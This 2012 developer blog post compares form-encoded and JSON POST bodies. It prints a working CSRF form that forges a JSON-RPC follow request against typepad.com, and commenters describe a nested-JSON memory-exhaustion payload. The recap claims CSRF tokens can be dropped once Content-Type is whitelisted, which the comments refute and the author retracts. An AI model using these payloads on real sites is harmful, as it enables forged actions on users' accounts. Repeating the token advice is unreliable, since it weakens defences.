Wednesday, June 6, 2012

x-www-form-urlencoded VS json - Pros and Cons. And Vulns.

In this short post I want to remind you how flexible HTTP requests are. By "requests" we usually mean GET and POST - these are the majority. A POST contains a "message" (the body), which is encoded with some Internet media type - more on the wiki.

By default, a <form method="post"> tag submits the request with this header:
Content-Type: application/x-www-form-urlencoded
This is the default encoding for form submissions. It sufficed just a few years ago, when people were sending nothing bigger or more complex than "email=my@mail.com&name=John".

It's 2012 now: the web has become much richer and more complex, and data sets are huge. Developers group related params into hashes/arrays in a "tricky" way. If you want to have user["email"] on the server side, you are supposed to send
<input name="user[email]">

but if you want user["emails"] - an array of emails - you should send
<input name="user[emails][]">

The application accumulates all params one by one and puts them into the corresponding variables. This approach is full of bugs and incompatibilities. Let me give you a hint.
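To make the accumulation step concrete, here is a minimal Python sketch of such a parser. It is a simplified illustration only, not the actual code of Rails, PHP or any other framework. The function name parse_nested is made up for this example, and it only understands names like user[email] plus a trailing [] for arrays.

```python
import re
from urllib.parse import parse_qsl


def parse_nested(query):
    """Fold bracketed form keys into dicts and lists (simplified sketch)."""
    result = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        # "user[emails][]" -> ["user", "emails", ""]
        parts = [key.split("[", 1)[0]] + re.findall(r"\[([^\]]*)\]", key)
        node = result
        for i, part in enumerate(parts[:-1]):
            # An empty next segment ("[]") means "append to a list".
            default = [] if parts[i + 1] == "" else {}
            node = node.setdefault(part, default)
        last = parts[-1]
        if last == "":
            node.append(value)
        else:
            node[last] = value
    return result


params = parse_nested(
    "user[email]=my@mail.com&user[emails][]=a@mail.com&user[emails][]=b@mail.com"
)
print(params)
```

Note that with this kind of parsing a numeric-looking segment such as arr[0][] ends up as the string key "0" in a dict rather than as a position in a list, and every value arrives as a string.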



Advantages of using JSON as the format of your POST body:
  • jQuery encoding issue:
$.post('', {arr: [ [1,2,1,2] ]})
This code produces
arr[0][]:1
arr[0][]:2
arr[0][]:1
arr[0][]:2
Which is totally different from the original array, because '0' is a string key, not an array index.
$.post('', {passengers:[{hi:1}, {hi:2}] })
Produces
passengers[0][hi]:1
passengers[1][hi]:2

But it is supposed to send
passengers[][hi]:1
passengers[][hi]:2

and so on. You have to take care of the JSON encoding yourself - jQuery's default encoding works properly only on small, simple data sets.
  • The default encoded string is longer, looks ugly and is barely readable.
{"passengers":[{"name":"Egor", "role":"pilot"},{"name":"DHH", "role":"2pilot"}]}

is much nicer than

passengers[][name]=Egor&passengers[][role]=pilot&passengers[][name]=DHH&passengers[][role]=2pilot
  • It's not a new approach. Cool teams already use it!
Some popular sites which I like and respect are in favor of JSON. Google wallet, Google+, etc
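
The first two points can be checked with a short Python sketch. It encodes the same passengers data both ways and compares the lengths, then round-trips a nested array through JSON. The variable names are only for illustration, and the form body is built with urllib's urlencode, which percent-encodes the brackets the way a browser does on the wire.

```python
import json
from urllib.parse import urlencode

passengers = [
    {"name": "Egor", "role": "pilot"},
    {"name": "DHH", "role": "2pilot"},
]

# Compact JSON body, as it would be sent with Content-Type: application/json.
json_body = json.dumps({"passengers": passengers}, separators=(",", ":"))

# The same data as bracketed form fields, percent-encoded for the wire.
form_pairs = [
    (f"passengers[][{key}]", value)
    for passenger in passengers
    for key, value in passenger.items()
]
form_body = urlencode(form_pairs)

print(len(json_body), json_body)
print(len(form_body), form_body)

# JSON keeps nested arrays intact: no index turns into a string key.
nested = {"arr": [[1, 2, 1, 2]]}
round_tripped = json.loads(json.dumps(nested))
print(round_tripped == nested)
```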

Vulns:
I am very proud of you if your application uses JSON as its default data format. But I'm gonna be disappointed if you really think it mitigates CSRF. It does if you have whitelisted the Content-Type of all requests to application/json. But if you just decode any incoming POST body, here is a workaround (I found it myself, but it's already known).

Showcase with a CSRF-ed "follow" action - typepad.com

<form method=post enctype="text/plain" action=http://profile.typepad.com/services/json-rpc><input name='{"a' value='":1,"method":"People.Create","params":[{"other_user_id":"6p00d8341c914353ef","ugroup_id":[10]}]}'></form>
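
Why this form works can be sketched in a few lines of Python. With enctype="text/plain" the browser does not percent-encode anything and sends each field as name=value followed by a line break, so the "=" simply lands inside a JSON key. The snippet below only rebuilds the body locally and parses it. It sends nothing, and the variable names are just for illustration.

```python
import json

# The two halves of the JSON document, split across the input's name and value.
name = '{"a'
value = (
    '":1,"method":"People.Create","params":'
    '[{"other_user_id":"6p00d8341c914353ef","ugroup_id":[10]}]}'
)

# text/plain form encoding: name, "=", value, CRLF, with no escaping.
body = f"{name}={value}\r\n"
print(body)

# A server that decodes any POST body as JSON accepts it without complaint.
parsed = json.loads(body)
print(parsed["method"], parsed["params"])
```

The stray "=" ends up in a throwaway key ("a="), and the rest of the object is exactly what the attacker wanted the endpoint to receive.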

Recap:
  • I strongly encourage you to use the JSON format in the body of POSTs everywhere and get rid of poor URI-encoded strings. And of PHP/Python - use Ruby, Luke.
  • It suits you if your objects are complicated and contain nested structures.
  • It allows you to send any kind of object, e.g. [[1,2],[3,4]] - Array(array, array, ...). This is just impossible to send in a URI-encoded string.
  • It's not comfortable if you send a simple "name=egor&type=lulzsec", since it will look "verbose".
  • Be aware that not all browsers have JSON built in so far. Use the json2/json3 library if you want to make it work.
  • It is used in good libs. http://emberjs.com/ is awesome, and Ruby on Rails parses a JSON body automatically - just send Content-Type: application/json.
  • A body format different from the default doesn't prevent CSRF. You can submit fake JSON and XML using name/value-splitting tricks and enctype=text/plain unless the application whitelists the Content-Type. An authenticity token is a MUST have.
  • You CAN omit CSRF tokens with this! Yes, those ugly long useless damn stupid buggy w3c-made-web-insecure tokens. You just need to whitelist Content-Type = application/json. :)
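
As a rough illustration of the stricter variant of this advice (whitelist the Content-Type and still require a token), here is a minimal Python sketch. Everything in it is an assumption made for the example: the function name, the idea that headers arrive as a plain dict with exactly these key spellings, and the use of an X-CSRF-Token header to carry the token. It is not the code of Rails or any other framework.

```python
import hmac


def is_acceptable_json_post(headers, expected_token):
    """Accept a POST only if it is declared as JSON and carries the right token."""
    # Ignore parameters such as "; charset=utf-8" when comparing the media type.
    content_type = headers.get("Content-Type", "")
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        # A plain HTML form can only send urlencoded, multipart or text/plain.
        return False

    if not expected_token:
        return False
    supplied = headers.get("X-CSRF-Token", "")
    # Constant-time comparison of the supplied token with the session's token.
    return hmac.compare_digest(supplied.encode(), expected_token.encode())


print(is_acceptable_json_post(
    {"Content-Type": "application/json; charset=utf-8", "X-CSRF-Token": "s3cret"},
    "s3cret",
))
print(is_acceptable_json_post({"Content-Type": "text/plain"}, "s3cret"))
```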
Do you use JSON format in body? Are you happy with that? Welcome to comments!

24 comments:

  1. There are a couple of problems with submitting JSON instead of form encoded data. Firstly it obviously doesn't work without JavaScript, so you need to fall back to form encoded anyway. But the potentially bigger issue is, what's to stop a nefarious individual creating a request like:
    {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: "you're outta ram" }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
    ?
    How much ram will the server have to allocate to represent that object? Doesn't this just make it much easier to DOS a server?

  2. @phpnode of course no! It is out of question, don't worry. Also you can build that much easier with a typical string:
    a[a][a][a][a][a][a]...=1 - the same thing. try to put some site down with that

    Most modern apps will not work w/o JS. So JS is required.

  3. does rails have a built in way to limit the size of the user supplied JSON? in PHP for example you can limit the number of POST params that will be accepted, (and it will instantiate comparatively cheap arrays, not objects) so it mitigates this kind of attack, presumably rails has a similar measure for normal POST params, but does it also cover JSON?

  4. You say of course, I say show me the code :P (seriously, I'm new to rails and I can't find the code that would deal with this, please point me in the right direction)

  5. @Egor Homakov, were you being sarcastic here?

    > @phpnode of course no! It is out of question, don't [worry.]

  6. @anon no, I just meant JSON overflow is not an attack we should consider :)

    1. That’s what I’m curious about. Why not?

    2. @anon every webserver has post_body_size limitations or smth like this - you can't send too much...
      if you have Proof of concept - it will change my mind

    3. Python 2.7.3, default recursion limit (1000), builtin json parser

      >>> import json
      >>> with open('payload-N.json') as fh:
      ...     raw = fh.read()
      ...
      >>> # Check memory
      >>> parsed = json.loads(raw)
      >>> # Check memory

      http://commondatastorage.googleapis.com/tmp23456754/payload-1.json

      928K expands by ~50M in memory

      http://commondatastorage.googleapis.com/tmp23456754/payload-2.json

      4.6M expands by ~200M in memory

    4. Also note that the 4.6M version compresses down to 11K with gzip, which means it takes 55K to hog 1G of memory if server supports Content-Encoding.

    5. it looks real. but there should be memory limits for app instance - not only JSON parsing can eat that much of memory... Should be.

      anyway you can do the same with form-urlencoded:
      a[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=1 - and it will take even less effort

  7. with ajax. so-called remote procedure calls will be common; every event will spawn some ajax call. thus each message will be shorter in length. further, apps will be common. www is satans hollow. 5 seconds per click to face ads and bs. boring as hell.

  8. Thanks, this helped me add a point to create a stronger checklist for my RPC handlers :)

    1. yes, content type must be checked. typepad is still vulnerable:)

  9. This is interesting. But I am not finding an easy means of forcing a form to post its data as json instead of x-www-form-urlencoded. Setting an enctype attribute on the form to 'application/json' seems to have no effect. Is there an easy means of accomplishing this, or does one necessarily have to code up some javascript in order to post data as json?

    1. yeah there is no way to send content type json.
      but you can use the trick mentioned above (Showcase with csrf-ed following - typepad.com)

  10. Just an FYI, Flash allows setting the Content-Type for cross-origin requests as shown here: http://saynotolinux.com/tests/flash-contenttype.html . You still need a CSRF token or custom header even if your endpoint requires a Content-Type of 'application/json'.

    1. Yes i mentioned this is not enough.
      Can Flash send X-Requested-With by any chance?

    2. > Yes i mentioned this is not enough.

      "You CAN omit CSRF tokens with this! [...] You just need to whitelist Content-Type = application/json." should probably be clarified then

      > Can Flash send X-Requested-With by any chance?

      You used to be able to, but not since 2009 or so ( http://helpx.adobe.com/flash-player/kb/arbitrary-headers-sent-flash-player.html ,) so it'd be fine to require that.

      Honestly though, if you already have CSRF tokens on hand it's probably best to require an 'X-CSRF-Token' header with a token in it. That way, someone has to screw up both restrictions on cross-domain reads and header setting for you to get CSRFed, and I don't trust plugin authors not to screw up header setting again.

    3. Oh, sorry, I changed my opinion few months after I published this post (it's 1.5 years old). Yes I fully agree, token (=nonce) is the best way to prove authenticity.

  11. Almost every major website prefers x-www-form-urlencoded over json for AJAX requests. What's the likely reason for that ?

    1. there's no real reason to use json. It is more handy format, but form-encoded is much more usual.
